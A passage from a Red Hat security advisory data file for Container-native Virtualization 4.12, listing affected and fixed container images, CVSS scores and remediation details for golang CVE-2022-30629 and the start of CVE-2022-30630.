"8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2092793", }, ], notes: [ { category: "description", text: "A flaw was found in the crypto/tls golang package. When session tickets are generated by crypto/tls, it is missing the ticket expiration. This issue may allow an attacker to observe the TLS handshakes to correlate successive connections during session resumption.", title: "Vulnerability description", }, { category: "summary", text: "golang: crypto/tls: session tickets lack random ticket_age_add", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", ], known_not_affected: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2022-30629", }, { category: "external", summary: "RHBZ#2092793", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2092793", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2022-30629", url: "https://www.cve.org/CVERecord?id=CVE-2022-30629", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2022-30629", url: "https://nvd.nist.gov/vuln/detail/CVE-2022-30629", }, { category: "external", summary: "https://groups.google.com/g/golang-announce/c/TzIC9-t8Ytg", url: "https://groups.google.com/g/golang-announce/c/TzIC9-t8Ytg", }, ], release_date: "2022-06-02T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2023-01-25T11:11:29+00:00", details: "Before applying this update, you must apply all previously released errata\nrelevant to your system.\n\nTo apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2023:0408", }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 3.1, baseSeverity: "LOW", confidentialityImpact: "LOW", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N", version: "3.1", }, products: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], threats: [ { category: "impact", details: "Low", }, ], title: "golang: crypto/tls: session tickets lack random ticket_age_add", }, { cve: "CVE-2022-30630", cwe: { id: "CWE-1325", name: "Improperly Controlled Sequential Memory Allocation", }, discovery_date: "2022-07-14T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", 